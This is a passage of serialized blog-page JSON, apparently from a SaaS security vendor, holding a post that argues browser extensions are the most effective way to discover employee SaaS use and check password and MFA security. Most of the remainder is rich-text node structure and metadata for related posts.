to build your own and you’re thinking about evaluating solutions, head over to ",[],{},{"nodeType":186,"data":314670,"content":314672},{"uri":314671},"https://pushsecurity.com/blog/how-to-find-the-right-saas-security-solution-for-your-organization/",[314673],{"nodeType":173,"value":314674,"marks":314675,"data":314677},"this post",[314676],{"type":194},{},{"nodeType":173,"value":314679,"marks":314680,"data":314681}," to understand which might be the best fit for your company. ",[],{},{"nodeType":178,"data":314683,"content":314684},{},[314685],{"nodeType":173,"value":314686,"marks":314687,"data":314688},"Next, we’ll dig into how we manage our own SaaS security to provide some relevant context and we’ll explain where the browser extension fits in",[],{},{"nodeType":235,"data":314690,"content":314691},{},[314692],{"nodeType":173,"value":314693,"marks":314694,"data":314695},"A case study…with us!",[],{},{"nodeType":178,"data":314697,"content":314698},{},[314699,314703,314712],{"nodeType":173,"value":314700,"marks":314701,"data":314702},"To put this into context, we’ll use ourselves as an example, since we’re a fully SaaS-native company. Our entire business is SaaS security, we have no physical or virtual infrastructure to manage and we actively encourage our employees to self-adopt SaaS solutions to solve their own business needs. We’re also a Google workspace enterprise customer and we educate our employees to ",[],{},{"nodeType":186,"data":314704,"content":314706},{"uri":314705},"https://pushsecurity.com/blog/should-i-let-my-employees-login-with-their-work-google-account",[314707],{"nodeType":173,"value":314708,"marks":314709,"data":314711},"always use Google social logins",[314710],{"type":194},{},{"nodeType":173,"value":314713,"marks":314714,"data":314715}," for SaaS solutions as the first choice when available ). ",[],{},{"nodeType":178,"data":314717,"content":314718},{},[314719,314723,314728],{"nodeType":173,"value":314720,"marks":314721,"data":314722},"We tuck all SaaS apps behind SSO, wherever we can and wherever our licenses will let us. And since we’re a fairly new company, we’ve been able to push social logins and “login with Google” to our employees since day one, so that’s a pretty clean and ideal world compared to the environments many security folks are working in. This means we really should be a best case example when it comes to centralized SaaS discovery methods. That said, we also use almost 100 different SaaS platforms across the company and, despite everything else above, 33% of these SaaS platforms are ",[],{},{"nodeType":173,"value":314724,"marks":314725,"data":314727},"only ",[314726],{"type":1646},{},{"nodeType":173,"value":314729,"marks":314730,"data":314731},"visible because we’re using a browser extension to discover them as our employees sign up.",[],{},{"nodeType":178,"data":314733,"content":314734},{},[314735,314739,314744],{"nodeType":173,"value":314736,"marks":314737,"data":314738},"A similar company without a browser extension ",[],{},{"nodeType":173,"value":314740,"marks":314741,"data":314743},"could be missing out on a third of their SaaS platforms",[314742],{"type":370},{},{"nodeType":173,"value":314745,"marks":314746,"data":314747},". Once we look at similar stats for our customers, particularly M365 users, we see the percentage of SaaS platforms that are only discovered via the browser extension increase and this is sometimes even as high as 70-80%. If you’re serious about SaaS discovery, then you should really not settle for missing such a large percentage of platforms.",[],{},{"nodeType":235,"data":314749,"content":314750},{},[314751],{"nodeType":173,"value":314752,"marks":314753,"data":314754},"Why does a browser see so much more?",[],{},{"nodeType":178,"data":314756,"content":314757},{},[314758,314762,314771],{"nodeType":173,"value":314759,"marks":314760,"data":314761},"Since SaaS is often self-adopted, the problem can often be attributed to a decentralized problem. Many SaaS vendors even encourage this as they have a product-led growth (PLG) model and prefer the frictionless growth of a PLG model over the high-friction sales cycle in a centralized procurement model. We’ve got a ",[],{},{"nodeType":186,"data":314763,"content":314765},{"uri":314764},"https://pushsecurity.com/webinar/securing-employee-adopted-saas-apps",[314766],{"nodeType":173,"value":314767,"marks":314768,"data":314770},"webinar with our co-founder",[314769],{"type":194},{},{"nodeType":173,"value":314772,"marks":314773,"data":314774}," on this topic if you want to explore further. ",[],{},{"nodeType":178,"data":314776,"content":314777},{},[314778],{"nodeType":173,"value":314779,"marks":314780,"data":314781},"Additionally, your average non-technical employee may not be familiar with SSO or social logins as access methods, but everyone knows how to sign-up for a website with an email address, username and password. Consequently, it’s just common for centralized data sources to end up missing a lot of SaaS use if they’re looking at logs, proxies, and other data sources.",[],{},{"nodeType":178,"data":314783,"content":314784},{},[314785,314789,314797],{"nodeType":173,"value":314786,"marks":314787,"data":314788},"Without SSO or social logins, you aren’t seeing anything via those data sources. If you use email discovery, you’ll have lots of false positives to deal with from marketing spam and you’ll only know about it for employees that used their corporate email address and for SaaS platforms that actively send out emails. If you’re relying on network data sources like web proxy data then you need to be capturing everything including home/mobile employees and even then most details will be hidden behind HTTPS connections. You could intercept and decrypt all HTTPS traffic via your proxy, but then you’d be introducing a huge security risk by decrypting all communications in one place. We’ve got a more thorough article on the topic of ",[],{},{"nodeType":186,"data":314790,"content":314791},{"uri":296864},[314792],{"nodeType":173,"value":314793,"marks":314794,"data":314796},"SaaS discovery data sources ",[314795],{"type":194},{},{"nodeType":173,"value":314798,"marks":314799,"data":314800},"and their pros and cons to read up on, too. ",[],{},{"nodeType":178,"data":314802,"content":314803},{},[314804],{"nodeType":173,"value":314805,"marks":314806,"data":314807},"On the other hand, browsers are quickly becoming the main way people operate from a desktop environment, with the browser as the way they’re doing almost every task. Since they’re using the browser to access their apps, it makes sense to use data collected from the browser to get visibility of SaaS. It doesn’t matter if they use an SSO login, a social login, an email address/password login, a corporate email or a personal webmail account - as long as they login or access the SaaS platform from a browser, then a browser extension is best placed to see that. Wherever the user is in the world, whatever they are doing, the extension can keep an eye out.",[],{},{"nodeType":235,"data":314809,"content":314810},{},[314811],{"nodeType":173,"value":314812,"marks":314813,"data":314814},"There are so many other security benefits beyond basic visibility",[],{},{"nodeType":178,"data":314816,"content":314817},{},[314818],{"nodeType":173,"value":314819,"marks":314820,"data":314821},"We’ve covered general visibility of SaaS platforms (i.e. whether they are in use or not, what login method is in use and by who), but there’s much more useful information for managing SaaS security risks. To secure SaaS, you also need to know whether multi-factor authentication (MFA) is in use; If the password is secure; If passwords are shared between different accounts; If accounts are shared between users; If sensitive files are uploaded to a particular SaaS platform.",[],{},{"nodeType":178,"data":314823,"content":314824},{},[314825],{"nodeType":173,"value":314826,"marks":314827,"data":314828},"Some SaaS vendors may provide APIs and logs that can answer some of these questions, but this tends to be limited to the biggest or most security conscious vendors. It’s overwhelming to handle this manually because you need to consider separate integrations with all your different SaaS vendors, and that’s assuming you already know they are in use. It might be viable for some of the most important SaaS platforms you use (think Salesforce, Slack, Trello, etc.) , but it’s not easy to go much further when you have hundreds of different SaaS platforms to consider.",[],{},{"nodeType":178,"data":314830,"content":314831},{},[314832],{"nodeType":173,"value":314833,"marks":314834,"data":314835},"A browser extension, on the other hand, can see all the interactions between users and any given SaaS platform, so it can provide insights that may not be visible via a SaaS vendor’s own APIs or logs. This is especially true for fairly standardized mechanisms such as web-based logins, where it provides an easy opportunity to provide password security checks and MFA checks. ",[],{},{"nodeType":178,"data":314837,"content":314838},{},[314839,314843,314851],{"nodeType":173,"value":314840,"marks":314841,"data":314842},"Being a decentralized model, this can all be achieved without sending lots of highly sensitive data (e.g. passwords) to a centralized point. Instead, the browser extension can just report individual security findings as necessary without feeding that private data to a central repository. The Push browser extension identifies weak passwords in use, MFA status, passwords shared between different SaaS platforms and even accounts being shared by multiple different users - none of this requires sending passwords or any other sensitive data to our central servers - just the findings themselves. You can find more information about what data we collect ",[],{},{"nodeType":186,"data":314844,"content":314846},{"uri":314845},"https://pushsecurity.com/help/audience/administrators/docs/install-the-browser-extension",[314847],{"nodeType":173,"value":28052,"marks":314848,"data":314850},[314849],{"type":194},{},{"nodeType":173,"value":197,"marks":314852,"data":314853},[],{},{"nodeType":235,"data":314855,"content":314856},{},[314857],{"nodeType":173,"value":314858,"marks":314859,"data":314860},"How do I roll out a browser extension to every single employee?",[],{},{"nodeType":178,"data":314862,"content":314863},{},[314864],{"nodeType":173,"value":314865,"marks":314866,"data":314867},"Traditionally, browser extensions have been focused on self-adoption by users via a browser extension store. In that case, the user makes the decision to install, rather than IT or security managing the deployment.",[],{},{"nodeType":178,"data":314869,"content":314870},{},[314871],{"nodeType":173,"value":314872,"marks":314873,"data":314874},"However, the major browser vendors have made it easy to install and manage browser extensions centrally, as well as making them more resilient to ensure they’re both secure and cannot induce significant performance issues in the browser.",[],{},{"nodeType":178,"data":314876,"content":314877},{},[314878],{"nodeType":173,"value":314879,"marks":314880,"data":314881},"Most larger organizations will be familiar with deploying desktop software remotely using central device management software, especially for endpoint security software like anti-virus and EDR. The same idea works with a browser extension using most of the common browser and operating system combinations. The Push browser extension can be deployed centrally on Chrome, Edge, Firefox and Brave, depending on the device management software and operating system in use. ",[],{},{"nodeType":178,"data":314883,"content":314884},{},[314885],{"nodeType":173,"value":314886,"marks":314887,"data":314888},"What’s more, browser extensions consist of JavaScript running in a tightly-controlled environment with additional performance controls in place by the browser and they even auto-update too. Compare this with the common case for endpoint security software of having an agent running as SYSTEM/root and users complaining it’s stealing all their CPU cycles and centralized browser deployment starts looking like a more attractive prospect than traditional endpoint agent deployment.",[],{},{"nodeType":235,"data":314890,"content":314891},{},[314892],{"nodeType":173,"value":40632,"marks":314893,"data":314894},[],{},{"nodeType":178,"data":314896,"content":314897},{},[314898],{"nodeType":173,"value":314899,"marks":314900,"data":314901},"We’re pretty into browser extensions here, but it’s not just because that’s how our product works. We’re not trying to sell you a new thing just for the sake of building something novel. Browser extensions are going to become one of the most important methods of managing SaaS security going forward. They’ve got advantages that other approaches just can’t match and centralized deployment and management is now a slick, easy and - frankly - solved problem. ",[],{},"Browser extensions are the most effective SaaS discovery tool because they can capture employee SaaS use and adoption in real time, as employees sign up. ","2023-04-25T00:00:00.000Z",{"items":314905},[314906,314908],{"sys":314907,"name":274157},{"id":274156},{"sys":314909,"name":26137},{"id":26136},{"items":314911},[314912],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":314913},{"url":8615},{"items":314915},[314916],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":314917},{"url":282559},{"json":314919,"links":315577},{"nodeType":165,"data":314920,"content":314921},{},[314922,314928,314934,314940,314948,314954,314959,314965,314970,314976,314982,314988,314994,315000,315006,315012,315018,315024,315037,315043,315049,315054,315060,315066,315079,315096,315102,315108,315114,315120,315126,315132,315150,315156,315162,315168,315174,315180,315186,315192,315198,315211,315241,315249,315255,315261,315267,315273,315294,315300,315306,315312,315318,315324,315330,315336,315342,315347,315353,315359,315365,315375,315381,315387,315393,315398,315404,315410,315416,315437,315443,315449,315455,315468,315474,315480,315486,315543,315548,315554,315560,315566,315571],{"nodeType":178,"data":314923,"content":314924},{},[314925],{"nodeType":173,"value":281811,"marks":314926,"data":314927},[],{},{"nodeType":178,"data":314929,"content":314930},{},[314931],{"nodeType":173,"value":280354,"marks":314932,"data":314933},[],{},{"nodeType":178,"data":314935,"content":314936},{},[314937],{"nodeType":173,"value":281824,"marks":314938,"data":314939},[],{},{"nodeType":178,"data":314941,"content":314942},{},[314943],{"nodeType":173,"value":281831,"marks":314944,"data":314947},[314945,314946],{"type":370},{"type":1646},{},{"nodeType":178,"data":314949,"content":314950},{},[314951],{"nodeType":173,"value":281840,"marks":314952,"data":314953},[],{},{"nodeType":312,"data":314955,"content":314958},{"target":314956},{"sys":314957},{"id":280474,"type":317,"linkType":318},[],{"nodeType":178,"data":314960,"content":314961},{},[314962],{"nodeType":173,"value":281852,"marks":314963,"data":314964},[],{},{"nodeType":312,"data":314966,"content":314969},{"target":314967},{"sys":314968},{"id":280624,"type":317,"linkType":318},[],{"nodeType":178,"data":314971,"content":314972},{},[314973],{"nodeType":173,"value":281864,"marks":314974,"data":314975},[],{},{"nodeType":169,"data":314977,"content":314978},{},[314979],{"nodeType":173,"value":281871,"marks":314980,"data":314981},[],{},{"nodeType":178,"data":314983,"content":314984},{},[314985],{"nodeType":173,"value":281878,"marks":314986,"data":314987},[],{},{"nodeType":178,"data":314989,"content":314990},{},[314991],{"nodeType":173,"value":281885,"marks":314992,"data":314993},[],{},{"nodeType":169,"data":314995,"content":314996},{},[314997],{"nodeType":173,"value":281892,"marks":314998,"data":314999},[],{},{"nodeType":235,"data":315001,"content":315002},{},[315003],{"nodeType":173,"value":280712,"marks":315004,"data":315005},[],{},{"nodeType":178,"data":315007,"content":315008},{},[315009],{"nodeType":173,"value":281905,"marks":315010,"data":315011},[],{},{"nodeType":235,"data":315013,"content":315014},{},[315015],{"nodeType":173,"value":281912,"marks":315016,"data":315017},[],{},{"nodeType":178,"data":315019,"content":315020},{},[315021],{"nodeType":173,"value":281919,"marks":315022,"data":315023},[],{},{"nodeType":178,"data":315025,"content":315026},{},[315027,315030,315034],{"nodeType":173,"value":281926,"marks":315028,"data":315029},[],{},{"nodeType":173,"value":281930,"marks":315031,"data":315033},[315032],{"type":1646},{},{"nodeType":173,"value":10557,"marks":315035,"data":315036},[],{},{"nodeType":235,"data":315038,"content":315039},{},[315040],{"nodeType":173,"value":281941,"marks":315041,"data":315042},[],{},{"nodeType":178,"data":315044,"content":315045},{},[315046],{"nodeType":173,"value":281948,"marks":315047,"data":315048},[],{},{"nodeType":312,"data":315050,"content":315053},{"target":315051},{"sys":315052},{"id":280733,"type":317,"linkType":318},[],{"nodeType":235,"data":315055,"content":315056},{},[315057],{"nodeType":173,"value":280739,"marks":315058,"data":315059},[],{},{"nodeType":178,"data":315061,"content":315062},{},[315063],{"nodeType":173,"value":280746,"marks":315064,"data":315065},[],{},{"nodeType":178,"data":315067,"content":315068},{},[315069,315072,315076],{"nodeType":173,"value":281972,"marks":315070,"data":315071},[],{},{"nodeType":173,"value":281976,"marks":315073,"data":315075},[315074],{"type":1646},{},{"nodeType":173,"value":281981,"marks":315077,"data":315078},[],{},{"nodeType":178,"data":315080,"content":315081},{},[315082,315087,315091],{"nodeType":173,"value":281988,"marks":315083,"data":315086},[315084,315085],{"type":370},{"type":1646},{},{"nodeType":173,"value":281994,"marks":315088,"data":315090},[315089],{"type":1646},{},{"nodeType":173,"value":10557,"marks":315092,"data":315095},[315093,315094],{"type":370},{"type":1646},{},{"nodeType":178,"data":315097,"content":315098},{},[315099],{"nodeType":173,"value":282007,"marks":315100,"data":315101},[],{},{"nodeType":235,"data":315103,"content":315104},{},[315105],{"nodeType":173,"value":282014,"marks":315106,"data":315107},[],{},{"nodeType":178,"data":315109,"content":315110},{},[315111],{"nodeType":173,"value":282021,"marks":315112,"data":315113},[],{},{"nodeType":235,"data":315115,"content":315116},{},[315117],{"nodeType":173,"value":282028,"marks":315118,"data":315119},[],{},{"nodeType":178,"data":315121,"content":315122},{},[315123],{"nodeType":173,"value":282035,"marks":315124,"data":315125},[],{},{"nodeType":178,"data":315127,"content":315128},{},[315129],{"nodeType":173,"value":282042,"marks":315130,"data":315131},[],{},{"nodeType":178,"data":315133,"content":315134},{},[315135,315138,315147],{"nodeType":173,"value":282049,"marks":315136,"data":315137},[],{},{"nodeType":1698,"data":315139,"content":315142},{"target":315140},{"sys":315141},{"id":282056,"type":317,"linkType":318},[315143],{"nodeType":173,"value":28052,"marks":315144,"data":315146},[315145],{"type":194},{},{"nodeType":173,"value":197,"marks":315148,"data":315149},[],{},{"nodeType":178,"data":315151,"content":315152},{},[315153],{"nodeType":173,"value":282069,"marks":315154,"data":315155},[],{},{"nodeType":178,"data":315157,"content":315158},{},[315159],{"nodeType":173,"value":282076,"marks":315160,"data":315161},[],{},{"nodeType":169,"data":315163,"content":315164},{},[315165],{"nodeType":173,"value":282083,"marks":315166,"data":315167},[],{},{"nodeType":235,"data":315169,"content":315170},{},[315171],{"nodeType":173,"value":282090,"marks":315172,"data":315173},[],{},{"nodeType":178,"data":315175,"content":315176},{},[315177],{"nodeType":173,"value":282097,"marks":315178,"data":315179},[],{},{"nodeType":178,"data":315181,"content":315182},{},[315183],{"nodeType":173,"value":282104,"marks":315184,"data":315185},[],{},{"nodeType":235,"data":315187,"content":315188},{},[315189],{"nodeType":173,"value":282111,"marks":315190,"data":315191},[],{},{"nodeType":178,"data":315193,"content":315194},{},[315195],{"nodeType":173,"value":282118,"marks":315196,"data":315197},[],{},{"nodeType":178,"data":315199,"content":315200},{},[315201,315204,315208],{"nodeType":173,"value":282125,"marks":315202,"data":315203},[],{},{"nodeType":173,"value":280833,"marks":315205,"data":315207},[315206],{"type":1646},{},{"nodeType":173,"value":280838,"marks":315209,"data":315210},[],{},{"nodeType":250,"data":315212,"content":315213},{},[315214,315223,315232],{"nodeType":254,"data":315215,"content":315216},{},[315217],{"nodeType":178,"data":315218,"content":315219},{},[315220],{"nodeType":173,"value":280851,"marks":315221,"data":315222},[],{},{"nodeType":254,"data":315224,"content":315225},{},[315226],{"nodeType":178,"data":315227,"content":315228},{},[315229],{"nodeType":173,"value":280861,"marks":315230,"data":315231},[],{},{"nodeType":254,"data":315233,"content":315234},{},[315235],{"nodeType":178,"data":315236,"content":315237},{},[315238],{"nodeType":173,"value":280871,"marks":315239,"data":315240},[],{},{"nodeType":178,"data":315242,"content":315243},{},[315244],{"nodeType":173,"value":282169,"marks":315245,"data":315248},[315246,315247],{"type":370},{"type":1646},{},{"nodeType":178,"data":315250,"content":315251},{},[315252],{"nodeType":173,"value":280887,"marks":315253,"data":315254},[],{},{"nodeType":235,"data":315256,"content":315257},{},[315258],{"nodeType":173,"value":282184,"marks":315259,"data":315260},[],{},{"nodeType":178,"data":315262,"content":315263},{},[315264],{"nodeType":173,"value":282191,"marks":315265,"data":315266},[],{},{"nodeType":178,"data":315268,"content":315269},{},[315270],{"nodeType":173,"value":282198,"marks":315271,"data":315272},[],{},{"nodeType":250,"data":315274,"content":315275},{},[315276,315285],{"nodeType":254,"data":315277,"content":315278},{},[315279],{"nodeType":178,"data":315280,"content":315281},{},[315282],{"nodeType":173,"value":282211,"marks":315283,"data":315284},[],{},{"nodeType":254,"data":315286,"content":315287},{},[315288],{"nodeType":178,"data":315289,"content":315290},{},[315291],{"nodeType":173,"value":282221,"marks":315292,"data":315293},[],{},{"nodeType":178,"data":315295,"content":315296},{},[315297],{"nodeType":173,"value":282228,"marks":315298,"data":315299},[],{},{"nodeType":235,"data":315301,"content":315302},{},[315303],{"nodeType":173,"value":282235,"marks":315304,"data":315305},[],{},{"nodeType":178,"data":315307,"content":315308},{},[315309],{"nodeType":173,"value":282242,"marks":315310,"data":315311},[],{},{"nodeType":178,"data":315313,"content":315314},{},[315315],{"nodeType":173,"value":282249,"marks":315316,"data":315317},[],{},{"nodeType":169,"data":315319,"content":315320},{},[315321],{"nodeType":173,"value":282256,"marks":315322,"data":315323},[],{},{"nodeType":235,"data":315325,"content":315326},{},[315327],{"nodeType":173,"value":282263,"marks":315328,"data":315329},[],{},{"nodeType":178,"data":315331,"content":315332},{},[315333],{"nodeType":173,"value":282270,"marks":315334,"data":315335},[],{},{"nodeType":178,"data":315337,"content":315338},{},[315339],{"nodeType":173,"value":282277,"marks":315340,"data":315341},[],{},{"nodeType":312,"data":315343,"content":315346},{"target":315344},{"sys":315345},{"id":280936,"type":317,"linkType":318},[],{"nodeType":235,"data":315348,"content":315349},{},[315350],{"nodeType":173,"value":282289,"marks":315351,"data":315352},[],{},{"nodeType":178,"data":315354,"content":315355},{},[315356],{"nodeType":173,"value":282296,"marks":315357,"data":315358},[],{},{"nodeType":178,"data":315360,"content":315361},{},[315362],{"nodeType":173,"value":282303,"marks":315363,"data":315364},[],{},{"nodeType":178,"data":315366,"content":315367},{},[315368,315371],{"nodeType":173,"value":282310,"marks":315369,"data":315370},[],{},{"nodeType":173,"value":282314,"marks":315372,"data":315374},[315373],{"type":1646},{},{"nodeType":235,"data":315376,"content":315377},{},[315378],{"nodeType":173,"value":282322,"marks":315379,"data":315380},[],{},{"nodeType":178,"data":315382,"content":315383},{},[315384],{"nodeType":173,"value":282329,"marks":315385,"data":315386},[],{},{"nodeType":178,"data":315388,"content":315389},{},[315390],{"nodeType":173,"value":282336,"marks":315391,"data":315392},[],{},{"nodeType":312,"data":315394,"content":315397},{"target":315395},{"sys":315396},{"id":274541,"type":317,"linkType":318},[],{"nodeType":235,"data":315399,"content":315400},{},[315401],{"nodeType":173,"value":282348,"marks":315402,"data":315403},[],{},{"nodeType":178,"data":315405,"content":315406},{},[315407],{"nodeType":173,"value":282355,"marks":315408,"data":315409},[],{},{"nodeType":178,"data":315411,"content":315412},{},[315413],{"nodeType":173,"value":282362,"marks":315414,"data":315415},[],{},{"nodeType":250,"data":315417,"content":315418},{},[315419,315428],{"nodeType":254,"data":315420,"content":315421},{},[315422],{"nodeType":178,"data":315423,"content":315424},{},[315425],{"nodeType":173,"value":282375,"marks":315426,"data":315427},[],{},{"nodeType":254,"data":315429,"content":315430},{},[315431],{"nodeType":178,"data":315432,"content":315433},{},[315434],{"nodeType":173,"value":282385,"marks":315435,"data":315436},[],{},{"nodeType":235,"data":315438,"content":315439},{},[315440],{"nodeType":173,"value":282392,"marks":315441,"data":315442},[],{},{"nodeType":178,"data":315444,"content":315445},{},[315446],{"nodeType":173,"value":282399,"marks":315447,"data":315448},[],{},{"nodeType":178,"data":315450,"content":315451},{},[315452],{"nodeType":173,"value":282406,"marks":315453,"data":315454},[],{},{"nodeType":178,"data":315456,"content":315457},{},[315458,315461,315465],{"nodeType":173,"value":282413,"marks":315459,"data":315460},[],{},{"nodeType":173,"value":236043,"marks":315462,"data":315464},[315463],{"type":370},{},{"nodeType":173,"value":282421,"marks":315466,"data":315467},[],{},{"nodeType":235,"data":315469,"content":315470},{},[315471],{"nodeType":173,"value":282428,"marks":315472,"data":315473},[],{},{"nodeType":178,"data":315475,"content":315476},{},[315477],{"nodeType":173,"value":282435,"marks":315478,"data":315479},[],{},{"nodeType":178,"data":315481,"content":315482},{},[315483],{"nodeType":173,"value":282442,"marks":315484,"data":315485},[],{},{"nodeType":250,"data":315487,"content":315488},{},[315489,315498,315507,315516,315525,315534],{"nodeType":254,"data":315490,"content":315491},{},[315492],{"nodeType":178,"data":315493,"content":315494},{},[315495],{"nodeType":173,"value":273418,"marks":315496,"data":315497},[],{},{"nodeType":254,"data":315499,"content":315500},{},[315501],{"nodeType":178,"data":315502,"content":315503},{},[315504],{"nodeType":173,"value":282464,"marks":315505,"data":315506},[],{},{"nodeType":254,"data":315508,"content":315509},{},[315510],{"nodeType":178,"data":315511,"content":315512},{},[315513],{"nodeType":173,"value":273438,"marks":315514,"data":315515},[],{},{"nodeType":254,"data":315517,"content":315518},{},[315519],{"nodeType":178,"data":315520,"content":315521},{},[315522],{"nodeType":173,"value":282483,"marks":315523,"data":315524},[],{},{"nodeType":254,"data":315526,"content":315527},{},[315528],{"nodeType":178,"data":315529,"content":315530},{},[315531],{"nodeType":173,"value":273458,"marks":315532,"data":315533},[],{},{"nodeType":254,"data":315535,"content":315536},{},[315537],{"nodeType":178,"data":315538,"content":315539},{},[315540],{"nodeType":173,"value":282502,"marks":315541,"data":315542},[],{},{"nodeType":312,"data":315544,"content":315547},{"target":315545},{"sys":315546},{"id":282509,"type":317,"linkType":318},[],{"nodeType":178,"data":315549,"content":315550},{},[315551],{"nodeType":173,"value":282515,"marks":315552,"data":315553},[],{},{"nodeType":235,"data":315555,"content":315556},{},[315557],{"nodeType":173,"value":282522,"marks":315558,"data":315559},[],{},{"nodeType":178,"data":315561,"content":315562},{},[315563],{"nodeType":173,"value":282529,"marks":315564,"data":315565},[],{},{"nodeType":312,"data":315567,"content":315570},{"target":315568},{"sys":315569},{"id":282536,"type":317,"linkType":318},[],{"nodeType":178,"data":315572,"content":315573},{},[315574],{"nodeType":173,"value":37,"marks":315575,"data":315576},[],{},{"entries":315578},{"inline":315579,"hyperlink":315580,"block":315583},[],[315581],{"sys":315582,"__typename":1528,"title":298859,"slug":298860},{"id":282056},[315584,315591,315594,315597,315604,315607,315610],{"sys":315585,"__typename":5345,"title":315586,"caption":315587,"layoutMode":118,"file":315588},{"id":280474},"Old software procurement process","Traditional software procurement process",{"url":315589,"width":310485,"height":315590},"https://images.ctfassets.net/y1cdw1ablpvd/5WwGnHoSxS9HFJMNYNrn4V/16c03fe426dce8a4d131a6185dcc9dc7/image__33_.png",502,{"sys":315592,"__typename":5345,"title":310481,"caption":310482,"layoutMode":118,"file":315593},{"id":280624},{"url":310484,"width":310485,"height":310486},{"sys":315595,"__typename":5345,"title":298879,"caption":298879,"layoutMode":112585,"file":315596},{"id":280733},{"url":298881,"width":298882,"height":298883},{"sys":315598,"__typename":5345,"title":315599,"caption":315600,"layoutMode":112585,"file":315601},{"id":280936},"Get in early to assess SaaS apps","\"Yes, unless\" is a good fit for self adoption because risk increases gradually",{"url":315602,"width":286466,"height":315603},"https://images.ctfassets.net/y1cdw1ablpvd/6KEFysuMJJS96lSqhGCGDV/f99004f71f088ff37e0fbbc0d81cff38/image8.png",864,{"sys":315605,"__typename":5345,"title":274681,"caption":274682,"layoutMode":112585,"file":315606},{"id":274541},{"url":274684,"width":5358,"height":274678},{"sys":315608,"__typename":5345,"title":313222,"caption":313223,"layoutMode":112585,"file":315609},{"id":282509},{"url":313225,"width":274691,"height":274692},{"sys":315611,"__typename":5345,"title":313228,"caption":313229,"layoutMode":112585,"file":315612},{"id":282536},{"url":313231,"width":5358,"height":274678},"content:blog:3-steps-to-secure-your-data-across-shadow-saas-apps.json","blog/3-steps-to-secure-your-data-across-shadow-saas-apps.json","blog/3-steps-to-secure-your-data-across-shadow-saas-apps",{"_path":315617,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":315618,"ogImage":118,"summary":315620,"title":281786,"subtitle":118,"metaTitle":315631,"synopsis":281787,"hashTags":118,"publishedDate":281788,"slug":281789,"tagsCollection":315632,"relatedBlogPostsCollection":315638,"authorsCollection":315934,"content":315938,"_id":317223,"_type":5439,"_source":5440,"_file":317224,"_stem":317225,"_extension":5439},"/blog/saas-has-changed-how-we-adopt-software-how-should-security-adapt",{"id":280332,"publishedAt":315619},"2025-01-15T14:26:48.422Z",{"json":315621},{"data":315622,"content":315623,"nodeType":165},{},[315624],{"data":315625,"content":315626,"nodeType":178},{},[315627],{"data":315628,"marks":315629,"value":315630,"nodeType":173},{},[],"Employees using a new work app used to be the final step of the software-onboarding process. Now it's the first. Security teams need to regain visibility and control over company data and how it’s secured.","SaaS sprawl must be managed with a new approach",{"items":315633},[315634,315636],{"sys":315635,"name":505},{"id":504},{"sys":315637,"name":274157},{"id":274156},{"items":315639},[315640],{"__typename":1528,"sys":315641,"content":315642,"title":294049,"synopsis":294050,"hashTags":118,"publishedDate":294051,"slug":294052,"tagsCollection":315924,"authorsCollection":315930},{"id":293723},{"json":315643},{"data":315644,"content":315645,"nodeType":165},{},[315646,315652,315669,315675,315681,315687,315693,315699,315705,315711,315717,315723,315729,315735,315741,315754,315760,315766,315772,315778,315784,315790,315805,315811,315817,315823,315829,315835,315842,315872,315879,315909],{"data":315647,"content":315648,"nodeType":178},{},[315649],{"data":315650,"marks":315651,"value":293734,"nodeType":173},{},[],{"data":315653,"content":315654,"nodeType":178},{},[315655,315658,315666],{"data":315656,"marks":315657,"value":293741,"nodeType":173},{},[],{"data":315659,"content":315662,"nodeType":1698},{"target":315660},{"sys":315661},{"id":282056,"type":317,"linkType":318},[315663],{"data":315664,"marks":315665,"value":247581,"nodeType":173},{},[],{"data":315667,"marks":315668,"value":293753,"nodeType":173},{},[],{"data":315670,"content":315671,"nodeType":178},{},[315672],{"data":315673,"marks":315674,"value":293760,"nodeType":173},{},[],{"data":315676,"content":315677,"nodeType":178},{},[315678],{"data":315679,"marks":315680,"value":293767,"nodeType":173},{},[],{"data":315682,"content":315683,"nodeType":178},{},[315684],{"data":315685,"marks":315686,"value":293774,"nodeType":173},{},[],{"data":315688,"content":315689,"nodeType":178},{},[315690],{"data":315691,"marks":315692,"value":293781,"nodeType":173},{},[],{"data":315694,"content":315695,"nodeType":235},{},[315696],{"data":315697,"marks":315698,"value":293788,"nodeType":173},{},[],{"data":315700,"content":315701,"nodeType":178},{},[315702],{"data":315703,"marks":315704,"value":293795,"nodeType":173},{},[],{"data":315706,"content":315707,"nodeType":178},{},[315708],{"data":315709,"marks":315710,"value":293802,"nodeType":173},{},[],{"data":315712,"content":315713,"nodeType":178},{},[315714],{"data":315715,"marks":315716,"value":293809,"nodeType":173},{},[],{"data":315718,"content":315719,"nodeType":178},{},[315720],{"data":315721,"marks":315722,"value":293816,"nodeType":173},{},[],{"data":315724,"content":315725,"nodeType":235},{},[315726],{"data":315727,"marks":315728,"value":293823,"nodeType":173},{},[],{"data":315730,"content":315731,"nodeType":178},{},[315732],{"data":315733,"marks":315734,"value":293830,"nodeType":173},{},[],{"data":315736,"content":315737,"nodeType":178},{},[315738],{"data":315739,"marks":315740,"value":293837,"nodeType":173},{},[],{"data":315742,"content":315743,"nodeType":178},{},[315744,315747,315751],{"data":315745,"marks":315746,"value":293844,"nodeType":173},{},[],{"data":315748,"marks":315749,"value":293849,"nodeType":173},{},[315750],{"type":1646},{"data":315752,"marks":315753,"value":293853,"nodeType":173},{},[],{"data":315755,"content":315756,"nodeType":178},{},[315757],{"data":315758,"marks":315759,"value":293860,"nodeType":173},{},[],{"data":315761,"content":315762,"nodeType":235},{},[315763],{"data":315764,"marks":315765,"value":293867,"nodeType":173},{},[],{"data":315767,"content":315768,"nodeType":178},{},[315769],{"data":315770,"marks":315771,"value":293874,"nodeType":173},{},[],{"data":315773,"content":315774,"nodeType":178},{},[315775],{"data":315776,"marks":315777,"value":293881,"nodeType":173},{},[],{"data":315779,"content":315780,"nodeType":178},{},[315781],{"data":315782,"marks":315783,"value":293888,"nodeType":173},{},[],{"data":315785,"content":315786,"nodeType":178},{},[315787],{"data":315788,"marks":315789,"value":293895,"nodeType":173},{},[],{"data":315791,"content":315792,"nodeType":178},{},[315793,315796,315802],{"data":315794,"marks":315795,"value":293902,"nodeType":173},{},[],{"data":315797,"content":315798,"nodeType":186},{"uri":293905},[315799],{"data":315800,"marks":315801,"value":293910,"nodeType":173},{},[],{"data":315803,"marks":315804,"value":197,"nodeType":173},{},[],{"data":315806,"content":315807,"nodeType":235},{},[315808],{"data":315809,"marks":315810,"value":293920,"nodeType":173},{},[],{"data":315812,"content":3158